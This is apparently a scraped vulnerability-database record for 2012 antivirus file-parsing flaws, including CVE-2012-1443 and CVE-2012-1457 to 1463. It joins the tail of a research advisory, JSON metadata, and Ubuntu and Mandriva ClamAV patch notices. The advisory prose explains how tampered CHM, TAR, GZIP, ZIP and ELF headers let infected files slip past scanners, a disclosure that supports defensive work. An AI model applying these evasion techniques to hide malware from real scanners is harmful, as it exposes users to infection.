Avast5 5.0.677.0, \n AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n scripts, and images compressed using the LZX algorithm. \n For faster random accesses, the algorithm is reset at intervals\n instead of compressing the entire file as a single stream. The\n length of each interval is specified in the LZXC header. \n\n If an infected CHM file\u0027s header modified so that the reset interval\n is lower than in the original file, the antivirus declares the file\n to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n the infected content located before the tampered header. \n\n Affected products -\n ClamAV 0.96.4, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n by a simple checksum. Every header also contains a file length field, which\n is used by the extractor to locate the next header in the archive. \n\n If a TAR archive contains two files: the first one is clean, while\n the second is infected with test EICAR virus - and it is modified such that \n the length field in the header of the first, clean file to point into the \n middle of the header of the second, infected file. The antivirus declares \n the file to be clean but virus gets extracted correctly by the \n GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, \n the antivirus declares the file to be clean but virus gets extracted by\n the gunzip+tar programs correctly by ignoring these bytes. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n \n CVE no - \n CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n when the contents are extracted. If an infected .tar.gz file is broken \n into two streams, the antivirus declares the infected .tar.gz file to \n be clean while tar+gunzip extract the virus correctly\n\n Affected products -\n AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1461\n\n44. If an infected ZIP archive is prepended with 1024 random bytes at the \n beginning, the antivirus declares the file to be clean but virus gets extracted\n by the unzip program correctly by skipping these bytes\n\n Affected products -\n AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n Symantec 20101.3.0.103 \n\n CVE no - \n CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n for little-endian, 02 for bigendian. Linux kernel, however, does not\n check this field before loading an ELF file. If an infected ELF file\u0027s 5-th \n byte is set to 02, the antivirus declares the file to be clean but the ELF \n file gets executed correctly. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n CVE no - \n CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n", "sources": [ { "db": "NVD", "id": "CVE-2012-1443" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "BID", "id": "52612" }, { "db": "VULHUB", "id": "VHN-54724" }, { "db": "PACKETSTORM", "id": "110990" } ], "trust": 2.07 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-1443", "trust": 2.9 }, { "db": "BID", "id": "52612", "trust": 1.4 }, { "db": "OSVDB", "id": "80469", "trust": 1.1 }, { "db": "OSVDB", "id": "80461", "trust": 1.1 }, { "db": "OSVDB", "id": "80454", "trust": 1.1 }, { "db": "OSVDB", "id": "80455", "trust": 1.1 }, { "db": "OSVDB", "id": "80467", "trust": 1.1 }, { "db": "OSVDB", "id": "80468", "trust": 1.1 }, { "db": "OSVDB", "id": "80471", "trust": 1.1 }, { "db": "OSVDB", "id": "80456", "trust": 1.1 }, { "db": "OSVDB", "id": "80459", "trust": 1.1 }, { "db": "OSVDB", "id": "80472", "trust": 1.1 }, { "db": "OSVDB", "id": "80470", "trust": 1.1 }, { "db": "OSVDB", "id": "80457", "trust": 1.1 }, { "db": "OSVDB", "id": "80460", "trust": 1.1 }, { "db": "OSVDB", "id": "80458", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2012-001895", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201203-407", "trust": 0.7 }, { "db": "BUGTRAQ", "id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS", "trust": 0.6 }, { "db": "NSFOCUS", "id": "19198", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-54724", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110990", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54724" }, { "db": "BID", "id": "52612" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "PACKETSTORM", "id": "110990" }, { "db": "CNNVD", "id": "CNNVD-201203-407" }, { "db": "NVD", "id": "CVE-2012-1443" } ] }, "id": "VAR-201203-0367", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-54724" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T21:46:28.266000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "AVL SDK", "trust": 0.8, "url": "http://www.antiy.net/en/avlsdk.html" }, { "title": "Command Antivirus", "trust": 0.8, "url": "http://www.authentium.com/command/CSAVDownload.html" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.avast.co.jp/index" }, { "title": "AVG Anti-Virus", "trust": 0.8, "url": "http://www.avgjapan.com/home-small-office-security/buy-antivirus" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.avira.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.rising-global.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.bitdefender.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.clamav.net/lang/en/" }, { "title": "Comodo Antivirus", "trust": 0.8, "url": "http://www.comodo.com/home/internet-security/antivirus.php" }, { "title": "Emsisoft Anti-Malware", "trust": 0.8, "url": "http://www.emsisoft.com/en/software/antimalware/" }, { "title": "ESET NOD32\u30a2\u30f3\u30c1\u30a6\u30a4\u30eb\u30b9", "trust": 0.8, "url": "http://www.eset.com/us/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.fortinet.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.f-prot.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.gdata.co.jp/" }, { "title": "IKARUS virus.utilities", "trust": 0.8, "url": "http://www.ikarus.at/en/ngo-gov/products/virus_utilities/index.html" }, { "title": "Jiangmin Antivirus", "trust": 0.8, "url": "http://global.jiangmin.com/" }, { "title": "K7 AntiVirus", "trust": 0.8, "url": "http://www.k7computing.com/en/Product/k7-antivirusplus.php" }, { "title": "MacAfee Scan Engine", "trust": 0.8, "url": "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.norman.com/" }, { "title": "nProtect Anti-Virus", "trust": 0.8, "url": "http://global.nprotect.com/product/avs.php" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.ps-japan.co.jp/" }, { "title": "PC Tools AntiVirus", "trust": 0.8, "url": "http://www.pctools.com/jp/spyware-doctor-antivirus/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.quickheal.com/" }, { "title": "Endpoint Protection", "trust": 0.8, "url": "http://www.symantec.com/ja/jp/endpoint-protection" }, { "title": "Top Page", "trust": 0.8, "url": "http://jp.trendmicro.com/jp/home/" }, { "title": "Trend Micro HouseCall", "trust": 0.8, "url": "http://jp.trendmicro.com/jp/tools/housecall/" }, { "title": "Top Page", "trust": 0.8, "url": "http://anti-virus.by/en" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.virusbuster.hu/en" }, { "title": "eSafe", "trust": 0.8, "url": "http://www.aladdin.co.jp/esafe/" }, { "title": "V3 Internet Security", "trust": 0.8, "url": "http://www.ahnlab.co.jp/product_service/product/b2b/v3is8.asp" }, { "title": "Kaspersky Anti-Virus", "trust": 0.8, "url": "http://www.kaspersky.com/kaspersky_anti-virus" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.sophos.com" }, { "title": "Microsoft Security Essentials", "trust": 0.8, "url": "http://windows.microsoft.com/ja-JP/windows/products/security-essentials" }, { "title": "McAfee Web Gateway", "trust": 0.8, "url": "http://www.mcafee.com/japan/products/web_gateway.asp" }, { "title": "F-Secure Anti-Virus", "trust": 0.8, "url": "http://www.f-secure.com/ja/web/home_jp/protection/anti-virus/overview" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001895" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54724" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "NVD", "id": "CVE-2012-1443" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/522005" }, { "trust": 1.7, "url": "http://www.ieee-security.org/tc/sp2012/program.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52612" }, { "trust": 1.1, "url": "http://osvdb.org/80454" }, { "trust": 1.1, "url": "http://osvdb.org/80455" }, { "trust": 1.1, "url": "http://osvdb.org/80456" }, { "trust": 1.1, "url": "http://osvdb.org/80457" }, { "trust": 1.1, "url": "http://osvdb.org/80458" }, { "trust": 1.1, "url": "http://osvdb.org/80459" }, { "trust": 1.1, "url": "http://osvdb.org/80460" }, { "trust": 1.1, "url": "http://osvdb.org/80461" }, { "trust": 1.1, "url": "http://osvdb.org/80467" }, { "trust": 1.1, "url": "http://osvdb.org/80468" }, { "trust": 1.1, "url": "http://osvdb.org/80469" }, { "trust": 1.1, "url": "http://osvdb.org/80470" }, { "trust": 1.1, "url": "http://osvdb.org/80471" }, { "trust": 1.1, "url": "http://osvdb.org/80472" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1443" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1443" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/19198" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2012/mar/88" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1419" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1439" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1436" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1440" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1432" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1438" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1428" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1446" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1443" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1444" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1441" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1430" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1434" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1435" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1424" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1431" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1425" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1423" }, { "trust": 0.1, "url": "http://www.ieee-security.org/tc/sp2012/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1442" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1433" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1420" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1445" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1437" } ], "sources": [ { "db": "VULHUB", "id": "VHN-54724" }, { "db": "BID", "id": "52612" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "PACKETSTORM", "id": "110990" }, { "db": "CNNVD", "id": "CNNVD-201203-407" }, { "db": "NVD", "id": "CVE-2012-1443" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-54724" }, { "db": "BID", "id": "52612" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "PACKETSTORM", "id": "110990" }, { "db": "CNNVD", "id": "CNNVD-201203-407" }, { "db": "NVD", "id": "CVE-2012-1443" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-03-21T00:00:00", "db": "VULHUB", "id": "VHN-54724" }, { "date": "2012-03-20T00:00:00", "db": "BID", "id": "52612" }, { "date": "2012-03-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "date": "2012-03-19T23:51:01", "db": "PACKETSTORM", "id": "110990" }, { "date": "2012-03-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201203-407" }, { "date": "2012-03-21T10:11:48.083000", "db": "NVD", "id": "CVE-2012-1443" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-11-06T00:00:00", "db": "VULHUB", "id": "VHN-54724" }, { "date": "2015-03-19T08:41:00", "db": "BID", "id": "52612" }, { "date": "2012-03-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "date": "2012-04-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201203-407" }, { "date": "2024-11-21T01:36:59.753000", "db": "NVD", "id": "CVE-2012-1443" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201203-407" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple products RAR Vulnerability that prevents file parsers from detecting malware", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001895" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control", "sources": [ { "db": "CNNVD", "id": "CNNVD-201203-407" } ], "trust": 0.6 } }
var-201203-0381
Vulnerability from variot
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By a third party TAR Total file size exceeded length With field TAR Malware detection can be bypassed via archive entries. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Vulnerabilities exist in the TAR file parser in version 1004, Trend Micro HouseCall version 9.120.0.1004, VBA32 version 3.12.14.2, and VirusBuster version 13.6.151.0. ============================================================================ Ubuntu Security Notice USN-1482-1 June 19, 2012
clamav vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
Summary:
ClamAV could improperly detect malware if it opened a specially crafted file.
Software Description: - clamav: Anti-virus utility for Unix
Details:
It was discovered that ClamAV incorrectly handled certain malformed TAR archives. (CVE-2012-1457, CVE-2012-1459)
It was discovered that ClamAV incorrectly handled certain malformed CHM files. (CVE-2012-1458)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: clamav 0.97.5+dfsg-1ubuntu0.12.04.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.1 libclamav6 0.97.5+dfsg-1ubuntu0.12.04.1
Ubuntu 11.10: clamav 0.97.5+dfsg-1ubuntu0.11.10.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.1 libclamav6 0.97.5+dfsg-1ubuntu0.11.10.1
Ubuntu 11.04: clamav 0.97.5+dfsg-1ubuntu0.11.04.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.1 libclamav6 0.97.5+dfsg-1ubuntu0.11.04.1
Ubuntu 10.04 LTS: clamav 0.96.5+dfsg-1ubuntu1.10.04.4 clamav-daemon 0.96.5+dfsg-1ubuntu1.10.04.4 libclamav6 0.96.5+dfsg-1ubuntu1.10.04.4
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-1482-1 CVE-2012-1457, CVE-2012-1458, CVE-2012-1459
Package Information: https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1 https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4 .
The Microsoft CHM file parser in ClamAV 0.96.4 allows remote attackers to bypass malware detection via a crafted reset interval in the LZXC header of a CHM file.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459 http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5
Updated Packages:
Mandriva Enterprise Server 5: d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf OUr1QL5Wsvt3KboLKCdYUhE= =1QL7 -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0381", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "virusbuster", "scope": "eq", "trust": 2.4, "vendor": "virusbuster", "version": "13.6.151.0" }, { "model": "avl sdk", "scope": "eq", "trust": 1.8, "vendor": "antiy", "version": "2.0.3.7" }, { "model": "command antivirus", "scope": "eq", "trust": 1.8, "vendor": "authentium", "version": "5.2.11.5" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "avg", "version": "10.0.0.1190" }, { "model": "bitdefender", "scope": "eq", "trust": 1.8, "vendor": "bitdefender", "version": "7.2" }, { "model": "clamav", "scope": "eq", "trust": 1.8, "vendor": "clamav", "version": "0.96.4" }, { "model": "anti-malware", "scope": "eq", "trust": 1.8, "vendor": "emsisoft", "version": "5.1.0.1" }, { "model": "virus utilities t3 command line scanner", "scope": "eq", "trust": 1.8, "vendor": "ikarus", "version": "1.1.97.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "jiangmin", "version": "13.0.900" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "pc tools", "version": "7.0.3.5" }, { "model": "esafe", "scope": "eq", "trust": 1.8, "vendor": "aladdin", "version": "7.0.17.0" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "kaspersky", "version": "7.0.0.125" }, { "model": "security essentials", "scope": "eq", "trust": 1.8, "vendor": "microsoft", "version": "2.0" }, { "model": "scan engine", "scope": "eq", "trust": 1.8, "vendor": "mcafee", "version": "5.400.0.1158" }, { "model": "avast antivirus", "scope": "eq", "trust": 1.0, "vendor": "alwil", "version": "5.0.677.0" }, { "model": "avast antivirus", "scope": "eq", "trust": 1.0, "vendor": "alwil", "version": "4.8.1351.0" }, { "model": "trend micro antivirus", "scope": "eq", "trust": 1.0, "vendor": "trendmicro", "version": "9.120.0.1004" }, { "model": "g data antivirus", "scope": "eq", "trust": 1.0, "vendor": "gdata", "version": "21" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "rising global", "version": "22.83.00.03" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "k7computing", "version": "9.77.3565" }, { "model": "nod32 antivirus", "scope": "eq", "trust": 1.0, "vendor": "eset", "version": "5795" }, { "model": "vba32", "scope": "eq", "trust": 1.0, "vendor": "anti virus", "version": "3.12.14.2" }, { "model": "endpoint protection", "scope": "eq", "trust": 1.0, "vendor": "symantec", "version": "11.0" }, { "model": "housecall", "scope": "eq", "trust": 1.0, "vendor": "trendmicro", "version": "9.120.0.1004" }, { "model": "gateway", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "2010.1c" }, { "model": "antivirus \\\u0026 antispyware", "scope": "eq", "trust": 1.0, "vendor": "norman", "version": "6.06.12" }, { "model": "quick heal", "scope": "eq", "trust": 1.0, "vendor": "cat", "version": "11.00" }, { "model": "f-prot antivirus", "scope": "eq", "trust": 1.0, "vendor": "f prot", "version": "4.6.2.117" }, { "model": "antivir", "scope": "eq", "trust": 1.0, "vendor": "avira", "version": "7.11.1.163" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "avast s r o", "version": "4.8.1351.0" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "avast s r o", "version": "5.0.677.0" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "avira", "version": "7.11.1.163" }, { "model": "antivirus", "scope": "eq", "trust": 